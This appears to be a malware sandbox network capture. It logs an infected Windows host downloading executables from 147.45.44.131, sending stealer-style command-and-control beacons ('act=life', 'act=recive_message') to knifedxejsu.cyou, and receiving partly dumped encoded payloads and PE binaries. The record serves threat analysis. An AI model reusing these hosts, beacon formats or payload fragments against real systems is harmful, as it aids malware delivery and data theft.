53 4b 71 31 56 48 53 35 4c 76 52 73 36 32 46 32 43 63 50 6a 51 51 6f 48 6f 45 64 74 33 6c 66 49 52 4b 57 69 35 32 37 43 6e 46 44 45 4d 54 46 4c 51 5a 37 44 68 65 39 42 56 69 64 53 33 59 43 5a 50 49 62 56 47 58 78 61 46 4e 76 4c 4e 6a 75 35 7a 32 64 44 4f 62 31 63 61 55 57 6d 70 50 38 59 43 64 6f 45 69 69 46 73 31 77 79 33 69 59 6f 63 6e 48 54 42 6c 7a 4c 64 67 79 6c 6d 42 4c 6c 70 65 36 49 39 75 71 6d 51 58 6b 62 52 64 78 75 4d 35 69 7a 68 77 [TRUNCATED] Data Ascii: $DTlprmibTRQQ10vbovRDk5VDMEmtOJHaEBGmTxPxUh1RIxOWkUkPldl7wicmzoVKKfMZTJSrfTjCEFuPq0JuZro1Q9pbU2x5UQG2loBaCs91ti2rnXv8f2lSqkJkUg6NVOiny23CZ8r6SV77Gyow6Zqr5obBfRQWWVFfAesWutJGbOA4MbdVsagwYqSKq1VHS5LvRs62F2CcPjQQoHoEdt3lfIRKWi527CnFDEMTFLQZ7Dhe9BVidS3YCZPIbVGXxaFNvLNju5z2dDOb1caUWmpP8YCdoEiiFs1wy3iYocnHTBlzLdgylmBLlpe6I9uqmQXkbRdxuM5izhw7dD2KYkxTqQLJoMQPhxWDdBXtAiE9QTMEtHtFGk1CSEtUG3JhvPABWttbf8JfgYC7EHPhSLIx5Tk9ICn69VdASKiAOSZ8alWuCWQyO1ZkGD6CIT2ckcGTkBPuYO3AlaXjxq7nmoSHwtuPegsupnnxfCJAFV9zyZy6fmERmfpvUyXrHAPiV8KynZDvh6h0PSJ7uX9rbaIJxrdheRtFGrcZOziQiIaPyZgBppxj0YHm0BBvlVQ0dbTXgjSueSJ2zsL7LcroUJeijqzNxn4WsKbXFSWG7CEIPfm8p4kJ51F3wbepjEwrnnapQo1sQlRSF63ED1X3DWq0EI04e5V3FNU1ExRBDrskKnY0I9mSg3o2wJkIXwOlYnNsLBzFKW0L2GPRjAWEiEmbZs4vNIeGdHWVa6OGahIUDcAqt3ZXbJCUBb2T6EsBhU7UktgNlO4Bv28mseBkiQ54EBWzDva5pGciFfFAmMcVfBY8Cg1rDHT1pCQi7hJqeyLoppgN8Bx6eJpCcmwV4i2hnLtCYX2FClhgp9jMANTBKmngNNGlkmVv54BewdoL8s4s1IMCDjVQZ06AYNoLQhUPZlKW8FQVZH3SSuOFADhB0G6FxAPjoduq7O2fxr4x3AqRxOi3yjKNzTpTPFX7p77mNckD29HJ8j8ZPOIj = 'dXaWR [TRUNCATED]
Nov 7, 2024 17:55:10.704566002 CET	1289	IN	Data Raw: 73 55 30 30 45 69 4a 43 37 67 6b 69 4e 79 4e 4c 6f 74 51 74 65 43 71 49 3d 27 0d 0a 24 6f 31 7a 63 59 47 6e 42 6c 55 66 59 30 36 52 50 51 49 37 48 49 5a 53 79 45 51 79 75 63 61 30 45 69 61 6e 63 4f 49 57 4d 4a 53 72 77 6e 6e 44 4b 49 31 45 58 54 Data Ascii: sU00EiJC7gkiNyNLotQteCqI='$o1zcYGnBlUfY06RPQI7HIZSyEQyuca0EiancOIWMJSrwnnDKI1EXTniYIA8HItYLuafqifAImUyq8WKQNnlK5ClurY3OaOEPtgBNHM130waypsqnpRuUHNfsokzULm88PiwrTxIAWSk91mFy8gYSTjHfAJYVMHRdYBjGwy3sItzp3G0CfBm5YPP6bQqK8mnNAGK0DyB9N5JZkRMujWhLWl
Nov 7, 2024 17:55:10.704685926 CET	1289	IN	Data Raw: 4f 7a 64 72 61 34 78 36 33 71 72 6b 4c 75 55 38 6c 7a 62 55 31 44 52 68 52 36 32 61 66 46 6b 4b 42 4d 41 4b 4c 6f 36 4e 4a 75 4c 67 49 79 41 51 69 62 73 34 76 44 58 4b 69 77 61 44 42 56 72 58 46 68 6a 79 75 4b 56 78 33 58 4c 36 73 61 38 54 36 4d Data Ascii: Ozdra4x63qrkLuU8lzbU1DRhR62afFkKBMAKLo6NJuLgIyAQibs4vDXKiwaDBVrXFhjyuKVx3XL6sa8T6MrENQOxpp2PO2MmDnb1PCW8OvA8rqRHXQ7p4mJp2lIFhGiALY3FzGE3qSpSPgFz8WsxuVRQdlz3tQrHMzX2XMHQMEyLxr9lfJ6VOlGoHM1NHaaa1iGPTccWNbkqXFTmMNnkj4t0t8WKltJc3YjPlT2C6KJdAQ0BteB
Nov 7, 2024 17:55:10.704710007 CET	1289	IN	Data Raw: 57 75 79 74 77 72 47 54 75 31 4f 67 51 77 5a 49 63 43 54 4b 61 4a 54 46 64 44 33 79 4b 6a 52 69 69 75 78 67 6e 51 6f 6e 57 68 6c 75 68 35 70 52 68 6f 6c 74 57 51 6d 34 6d 6b 4c 41 63 64 61 54 2f 37 4b 6d 69 4b 4b 4c 46 62 2f 77 42 38 57 67 39 32 Data Ascii: WuytwrGTu1OgQwZIcCTKaJTFdD3yKjRiiuxgnQonWhluh5pRholtWQm4mkLAcdaT/7KmiKKLFb/wB8Wg92VDXw5eqa4l0IYhDXoqWJkKVu0sV+UKUrdgVS5eYqUbdY36BRvofr9JZXPX4k+81twtzhsuHZipRa32yRf8CPBrwc8RgVEV8tmM04+PH2xkKtayCQE6H+xXqo/Q28Q1vWmEitYhgLQBw68D3u+0HGySIUT70OKbOur
Nov 7, 2024 17:55:10.704735994 CET	1289	IN	Data Raw: 47 6e 4b 39 4a 61 35 5a 39 6c 51 63 57 33 30 36 49 74 77 77 6e 35 55 38 4f 59 57 63 64 79 2f 73 75 56 66 45 48 56 6f 5a 43 6d 4d 6d 6f 67 69 35 73 57 38 6c 4d 32 5a 65 76 38 4e 61 46 7a 52 69 6f 4a 6f 30 44 79 59 4f 51 69 51 77 33 59 30 6a 64 55 Data Ascii: GnK9Ja5Z9lQcW306Itwwn5U8OYWcdy/suVfEHVoZCmMmogi5sW8lM2Zev8NaFzRioJo0DyYOQiQw3Y0jdUK1Ssm/DjD9V8596XepkaqKpH/4grA8WQx5D+TlpO20EOWKK/f7t612T3H6tDXqkoKeaoyJoDCtybXuDvTLT5CbsC3cjJTrdk+6ncihYyYGDRYmvhcTXL2LPjnc1yaWqp2Sc55iudDYsoZQYP3Zr76Mab2dQs6Y0u5
Nov 7, 2024 17:55:10.704762936 CET	1289	IN	Data Raw: 4b 30 6c 5a 76 64 70 4c 39 57 48 44 71 4a 59 72 32 65 50 6f 71 78 47 48 54 46 65 49 4b 73 72 73 4b 4c 61 6b 6f 58 46 46 69 39 4e 6f 6e 4b 69 34 58 30 42 6c 42 74 7a 4e 54 64 47 70 7a 67 42 67 34 50 74 66 38 64 44 45 38 4b 47 51 6b 53 55 49 58 4b Data Ascii: K0lZvdpL9WHDqJYr2ePoqxGHTFeIKsrsKLakoXFFi9NonKi4X0BlBtzNTdGpzgBg4Ptf8dDE8KGQkSUIXKkjqFqRMX0KRPGB86U7RDvkXxMrnj3BTx1pwRqYZc3LMsmTEEhNxmrUOAWtsz42uZrUnRFQgwIfak74KtniCPD6GHavvx5ZIAQnB25my07BeLk43rizLl0fWUOghJWi0i793j3hYAkbhCsuVF2EO5NV9b1hOoFpFoa
Nov 7, 2024 17:55:10.704771042 CET	1289	IN	Data Raw: 67 7a 41 56 45 4f 62 53 56 51 6d 35 43 35 34 35 76 6f 7a 55 79 34 57 58 4d 45 6f 67 51 70 78 49 63 6b 46 63 72 67 74 79 7a 69 38 59 4f 31 71 76 30 67 43 47 56 66 62 4d 65 64 4b 41 5a 76 42 36 53 64 74 52 5a 73 64 4f 75 41 57 51 76 78 49 6b 4f 74 Data Ascii: gzAVEObSVQm5C545vozUy4WXMEogQpxIckFcrgtyzi8YO1qv0gCGVfbMedKAZvB6SdtRZsdOuAWQvxIkOtPamrmwJtxO6t8DgCFa8857CoMWTUQg40m5f0j1rwI5uZiB1R9tr7LfYi8yf1dodQjGHDYPSdjbZAcdGLtBlVpwOGHxslm0TUsdfbtYtTbNoaQXFvs47bDQ1nrAv0V6rTSFIyx4R4H1kbIeqjrxtSshQbMsjt33xEV
Nov 7, 2024 17:55:10.704803944 CET	1289	IN	Data Raw: 4d 63 56 66 42 59 38 43 67 31 72 44 48 54 31 70 43 51 69 37 68 4a 71 65 79 4c 6f 70 70 67 4e 38 42 78 36 65 4a 70 43 63 6d 77 56 34 69 32 68 6e 4c 74 43 59 58 32 46 43 6c 68 67 70 39 6a 4d 41 4e 54 42 4b 6d 6e 67 4e 4e 47 6c 6b 6d 56 76 35 34 42 Data Ascii: McVfBY8Cg1rDHT1pCQi7hJqeyLoppgN8Bx6eJpCcmwV4i2hnLtCYX2FClhgp9jMANTBKmngNNGlkmVv54BewdoL8s4s1IMCDjVQZ06AYNoLQhUPZlKW8FQVZH3SSuOFADhB0G6FxAPjoduq7O2fxr4x3AqRxOi3yjKNzTpTPFX7p77mNckD29HJ8j8ZPOIj, $o1zcYGnBlUfY06RPQI7HIZSyEQyuca0EiancOIWMJSrwnnDKI
Nov 7, 2024 17:55:10.704811096 CET	1289	IN	Data Raw: 43 74 70 49 57 62 37 64 36 67 6b 69 66 39 6a 61 64 72 7a 62 39 77 77 31 4e 50 44 6b 67 73 46 47 31 45 6d 56 72 4b 49 4f 31 6f 31 6c 61 74 70 6a 36 35 64 49 74 5a 4b 47 77 59 76 47 38 6d 77 65 61 64 52 62 6e 58 6a 32 69 6c 4a 6c 35 4c 71 54 30 54 Data Ascii: CtpIWb7d6gkif9jadrzb9ww1NPDkgsFG1EmVrKIO1o1latpj65dItZKGwYvG8mweadRbnXj2ilJl5LqT0TOLOxNBug02PCgfsnLxcOwJlL0HQZal8cgO7lZdZPgGxQNfE4tiAsgMXFZD6Gl4FeucV2HHX78X7pM4xkDm5skfv4q2WVGT4MBSVaTcVmU2UTe8suFmCzyMuOhsbflB1OtWnuIV10Zj8SUbpR90QUQ4NoXHt1BgATA
Nov 7, 2024 17:55:10.704818010 CET	1289	IN	Data Raw: 78 54 71 51 4c 4a 6f 4d 51 50 68 78 57 44 64 42 58 74 41 69 45 39 51 54 4d 45 74 48 74 46 47 6b 31 43 53 45 74 55 47 33 4a 68 76 50 41 42 57 74 74 62 66 38 4a 66 67 59 43 37 45 48 50 68 53 4c 49 78 35 54 6b 39 49 43 6e 36 39 56 64 41 53 4b 69 41 Data Ascii: xTqQLJoMQPhxWDdBXtAiE9QTMEtHtFGk1CSEtUG3JhvPABWttbf8JfgYC7EHPhSLIx5Tk9ICn69VdASKiAOSZ8alWuCWQyO1ZkGD6CIT2ckcGTkBPuYO3AlaXjxq7nmoSHwtuPegsupnnxfCJAFV9zyZy6fmERmfpvUyXrHAPiV8KynZDvh6h0PSJ7uX9rbaIJxrdheRtFGrcZOziQiIaPyZgBppxj0YHm0BBvlVQ0dbTXgjSue
Nov 7, 2024 17:55:10.905092955 CET	1289	IN	Data Raw: 64 71 73 30 72 30 36 4a 71 57 65 30 32 46 62 68 31 61 62 72 54 55 73 55 45 5a 39 74 7a 35 32 6a 6c 68 74 56 47 6c 6f 4a 58 31 58 72 38 32 4e 34 74 72 4b 4f 44 52 44 53 79 37 57 31 71 63 4b 57 73 76 65 6b 4c 50 62 66 6c 32 34 72 78 41 6d 62 4d 46 Data Ascii: dqs0r06JqWe02Fbh1abrTUsUEZ9tz52jlhtVGloJX1Xr82N4trKODRDSy7W1qcKWsvekLPbfl24rxAmbMFAHUOg3ebY8ZVSlRCzdn2SeP52bmLWxlkPkbCAdOLGaqDPYJj9vAJnjmVsplFg2Q0nfH7JPBWYcVinMPE1DbZxcw6yPKKsJ4dU0PaRc9UtekKVE8fahedrq2Lib9uEq3PIjYVwfno3R5TrmJtg4aK5qm3yErfCfPDK
Nov 7, 2024 17:55:11.449738979 CET	155	OUT	GET /infopage/hdt.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131
Nov 7, 2024 17:55:11.639450073 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 16:55:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 06 Nov 2024 18:13:46 GMT ETag: "b000-626427a8e8d36" Accept-Ranges: bytes Content-Length: 45056 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 11 3e 9d 93 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 0a 00 00 00 00 00 00 6a c3 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c3 00 00 4f 00 00 00 00 e0 00 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 fc c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL>"0j @ `O H.textp `.rsrc@@.reloc@BLH"h0S(rp(o(r3p(os%oo~o~((0(rp(o(~((osso(rp(oo&o(r-p(oo&o%oo(rWp(oo(rqp(oo%%o &(0c(!o"iYpai +'aao# [TRUNCATED]
Nov 7, 2024 17:55:11.909343958 CET	156	OUT	GET /infopage/tbg9.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131
Nov 7, 2024 17:55:12.108319044 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 16:55:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 06 Nov 2024 18:11:21 GMT ETag: "4c200-6264271ea9617" Accept-Ranges: bytes Content-Length: 311808 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 91 33 25 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f8 03 00 00 c6 00 00 00 00 00 00 00 d4 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 30 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 3c 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 31 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL3%g@@80@<A1.textZ `.rdata]%&@@.datap@^"@.reloc<A@B@B [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.11.20	49740	142.251.32.99	80

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 17:55:42.619442940 CET	200	OUT	GET /r/r1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Nov 7, 2024 17:55:42.722769976 CET	222	IN	HTTP/1.1 304 Not Modified Date: Thu, 07 Nov 2024 16:48:06 GMT Expires: Thu, 07 Nov 2024 17:38:06 GMT Age: 456 Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49711	104.21.19.177	443	1752	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 16:55:14 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: knifedxejsu.cyou
2024-11-07 16:55:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-07 16:55:14 UTC	1005	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 16:55:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2fvkk5ig5jmu7tdrhdlgehijit; expires=Mon, 03-Mar-2025 10:41:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=586RlBz7kLJ4b8okh8EM6Pbrl%2FlOzu32CmNE3wgFTXNfYUZhXSKOokJPlbbUHXnCZ0HOSP0GDoQWzuUTygTXIzVUbbvTgG3G6zsUSfwFIXWM47%2FG0VIu3VQWnbD10Kn76y5t"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8deed98b1bcf4240-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=103679&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=36526&cwnd=252&unsent_bytes=0&cid=2e8a3c6c91508dfd&ts=535&x=0"
2024-11-07 16:55:14 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-07 16:55:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49712	104.21.19.177	443	1752	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 16:55:15 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 81 Host: knifedxejsu.cyou
2024-11-07 16:55:15 UTC	81	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 74 6f 70 67 63 72 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@topgcr&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-11-07 16:55:15 UTC	1006	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 16:55:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f5hpur29j2d57bo9o0c35kcd1q; expires=Mon, 03-Mar-2025 10:41:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eLw%2Ft2Q42f9QynleciW08XcxAzDMfmSJHVdmwsS5X%2F0m4b1BZlV3Qxqfe6CIasjEj1DvRNOtf1T2K8Hx7aPQeX%2FRLABCRSKKzmm8lOSV0Xuplfnm5Ah0MJNdBe2PKk7M5eED"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8deed990797f59a3-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=108794&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=981&delivery_rate=35109&cwnd=63&unsent_bytes=0&cid=3aeac78aedaa84f9&ts=859&x=0"
2024-11-07 16:55:15 UTC	363	IN	Data Raw: 31 64 39 30 0d 0a 74 2f 2b 4a 31 6f 77 4b 4f 52 74 4c 39 37 79 6d 6d 38 39 36 63 7a 33 42 75 65 32 7a 68 6b 6e 43 75 54 33 30 72 68 4e 72 77 6f 54 4d 33 66 2f 30 74 6a 34 56 4f 54 69 53 6e 70 7a 39 72 68 59 41 57 4f 32 62 6a 4e 65 6b 63 36 54 59 55 59 66 4c 50 30 6d 30 36 5a 58 46 37 37 66 67 65 56 77 33 61 5a 4c 45 68 4b 47 55 41 56 46 59 72 35 76 58 6b 65 4d 6a 6f 4e 68 52 6c 73 39 34 42 4c 4c 6f 31 4a 66 6c 73 65 52 76 57 6e 38 71 6d 39 48 44 2f 71 6f 62 47 56 4f 6f 31 49 58 65 70 47 58 67 33 45 66 57 6c 44 45 6d 70 2f 44 57 73 75 69 6c 35 79 68 45 4e 7a 44 56 32 63 69 35 39 56 67 53 57 4b 50 56 69 39 66 74 49 61 72 52 57 5a 66 4b 65 52 75 72 34 74 2b 58 36 37 4c 6c 5a 56 4e 72 4a 35 48 57 79 50 69 67 47 31 45 52 34 39 79 58 6b 62 78 72 38 2b 6c 63 68 Data Ascii: 1d90t/+J1owKORtL97ymm896cz3Bue2zhknCuT30rhNrwoTM3f/0tj4VOTiSnpz9rhYAWO2bjNekc6TYUYfLP0m06ZXF77fgeVw3aZLEhKGUAVFYr5vXkeMjoNhRls94BLLo1JflseRvWn8qm9HD/qobGVOo1IXepGXg3EfWlDEmp/DWsuil5yhENzDV2ci59VgSWKPVi9ftIarRWZfKeRur4t+X67LlZVNrJ5HWyPigG1ER49yXkbxr8+lch
2024-11-07 16:55:15 UTC	1369	IN	Data Raw: 2f 79 2f 45 78 68 53 72 74 75 43 32 2b 73 6f 6f 4e 78 56 6e 4d 4e 37 44 61 33 72 30 35 33 72 39 4b 41 6f 58 47 46 70 7a 5a 37 6e 2f 4c 30 66 48 55 6e 68 34 63 2f 4f 71 6a 4c 67 33 46 50 57 6c 44 45 42 70 65 58 57 6c 75 53 33 35 6d 4e 4a 65 54 75 54 30 38 48 72 71 78 30 66 56 61 44 4a 68 64 2f 69 4b 4b 6e 51 56 70 50 4c 64 55 6e 75 70 74 4b 46 71 2b 79 75 53 56 5a 79 4a 5a 2f 4a 78 4c 6d 79 56 67 67 66 70 4e 66 50 69 61 51 76 6f 64 39 65 6b 73 4a 2f 44 61 7a 67 32 35 44 6b 73 75 52 6f 58 48 4d 68 6e 64 2f 4a 38 71 49 59 46 46 4b 6e 33 59 50 51 34 57 76 75 6d 31 69 4f 6a 43 6c 4a 6a 75 48 57 6a 36 6d 42 37 57 5a 56 66 6a 2f 56 77 59 72 67 37 52 38 64 48 2f 75 62 67 64 54 72 4f 61 48 4a 57 70 6a 65 66 51 79 6d 36 39 61 54 36 37 48 70 5a 56 56 2f 4c 70 62 57 Data Ascii: /y/ExhSrtuC2+sooNxVnMN7Da3r053r9KAoXGFpzZ7n/L0fHUnh4c/OqjLg3FPWlDEBpeXWluS35mNJeTuT08Hrqx0fVaDJhd/iKKnQVpPLdUnuptKFq+yuSVZyJZ/JxLmyVggfpNfPiaQvod9eksJ/Dazg25DksuRoXHMhnd/J8qIYFFKn3YPQ4Wvum1iOjClJjuHWj6mB7WZVfj/VwYrg7R8dH/ubgdTrOaHJWpjefQym69aT67HpZVV/LpbW
2024-11-07 16:55:15 UTC	1369	IN	Data Raw: 38 64 48 2f 75 62 67 39 6a 6b 49 4b 72 66 58 35 48 42 64 41 71 6e 35 64 69 61 34 62 72 70 62 46 64 77 4a 4a 50 65 77 2f 32 6f 43 68 52 57 72 39 66 50 6e 36 51 73 75 4a 73 48 31 75 4e 32 48 36 50 4a 31 6f 7a 69 39 50 45 6d 51 6a 6b 75 6d 5a 36 63 75 61 6f 64 47 56 53 6c 30 34 2f 44 34 53 57 72 32 6c 57 51 7a 58 77 46 70 75 62 55 6e 65 32 34 37 6d 39 63 61 7a 75 51 32 4e 62 7a 37 56 5a 52 57 4c 75 62 31 35 48 53 4f 37 66 4b 53 64 54 35 63 67 65 75 34 63 50 64 39 50 72 33 4b 46 78 31 61 63 32 65 7a 2f 6d 68 48 78 6c 5a 70 39 4f 41 33 75 30 35 6f 64 64 52 68 4d 74 78 41 4b 37 70 32 5a 54 6d 73 2b 4e 6a 55 58 51 74 6b 74 2b 45 74 2b 30 66 43 52 2f 37 6d 37 6e 42 36 53 65 4f 30 46 4f 66 6a 47 35 48 75 61 62 53 6b 61 76 73 72 6d 78 58 63 53 4f 61 31 38 37 7a 6f Data Ascii: 8dH/ubg9jkIKrfX5HBdAqn5dia4brpbFdwJJPew/2oChRWr9fPn6QsuJsH1uN2H6PJ1ozi9PEmQjkumZ6cuaodGVSl04/D4SWr2lWQzXwFpubUne247m9cazuQ2Nbz7VZRWLub15HSO7fKSdT5cgeu4cPd9Pr3KFx1ac2ez/mhHxlZp9OA3u05oddRhMtxAK7p2ZTms+NjUXQtkt+Et+0fCR/7m7nB6SeO0FOfjG5HuabSkavsrmxXcSOa187zo
2024-11-07 16:55:15 UTC	1369	IN	Data Raw: 73 6d 38 47 52 34 7a 50 67 67 78 2b 35 36 30 52 4c 67 64 79 56 67 71 57 74 72 6d 39 58 4f 58 48 56 30 73 66 31 70 52 63 58 56 71 2f 52 68 74 72 6f 49 4b 54 58 56 70 50 4b 63 41 79 6c 35 39 47 52 34 62 4c 74 61 31 52 32 4a 70 32 65 69 72 6d 71 41 46 45 48 34 2f 36 59 32 75 6f 74 34 4d 51 52 6a 34 78 32 42 65 43 2b 6c 5a 48 69 73 75 68 74 56 33 67 76 6e 64 76 4d 2f 61 77 65 46 31 79 73 33 34 72 51 36 79 2b 73 31 56 57 58 7a 58 30 43 72 2b 33 51 33 61 58 30 36 58 41 62 49 57 6d 6b 33 64 4c 75 76 52 52 52 51 4f 33 43 7a 39 62 6f 61 2f 69 62 58 6f 54 47 65 77 65 6c 36 64 43 65 35 4c 50 6a 62 6c 64 7a 49 4a 33 59 79 2f 43 2f 47 78 31 52 70 4e 57 44 33 2b 6b 68 6f 39 59 66 32 49 78 32 45 65 43 2b 6c 62 48 73 75 63 42 6a 56 33 35 70 69 70 44 64 75 61 6f 55 55 51 Data Ascii: sm8GR4zPggx+560RLgdyVgqWtrm9XOXHV0sf1pRcXVq/RhtroIKTXVpPKcAyl59GR4bLta1R2Jp2eirmqAFEH4/6Y2uot4MQRj4x2BeC+lZHisuhtV3gvndvM/aweF1ys34rQ6y+s1VWXzX0Cr+3Q3aX06XAbIWmk3dLuvRRRQO3Cz9boa/ibXoTGewel6dCe5LPjbldzIJ3Yy/C/Gx1RpNWD3+kho9Yf2Ix2EeC+lbHsucBjV35pipDduaoUUQ
2024-11-07 16:55:15 UTC	1369	IN	Data Raw: 35 2b 4d 37 73 4e 67 64 70 39 70 79 48 36 76 72 32 64 33 30 2b 76 63 6f 58 48 56 70 7a 5a 37 43 39 71 51 62 48 6c 36 71 31 34 4c 55 37 53 36 68 33 56 75 63 78 6e 45 50 70 75 66 51 6c 2b 69 31 35 47 46 63 63 53 36 57 7a 49 53 33 37 52 38 4a 48 2f 75 62 70 74 62 32 4a 62 43 62 51 4e 6a 56 4d 51 36 73 70 6f 33 64 37 37 37 68 62 46 78 31 4c 35 44 59 79 66 69 69 47 52 46 51 70 39 43 47 31 2b 55 6d 70 64 5a 62 68 4d 5a 36 42 71 7a 76 32 5a 43 72 2b 71 35 76 51 7a 6c 78 31 65 2f 4a 39 36 4d 66 42 78 2b 38 6c 5a 61 52 34 79 66 67 67 78 2b 58 77 48 34 4b 72 2b 58 57 6e 4f 47 6d 2f 47 52 53 63 53 79 5a 31 63 72 2f 76 78 34 65 56 71 44 59 68 74 62 73 4a 36 72 59 57 4e 61 43 4d 51 36 34 70 6f 33 64 79 4b 50 2b 5a 52 74 6d 5a 34 79 65 77 2f 58 74 51 46 46 58 72 74 4f Data Ascii: 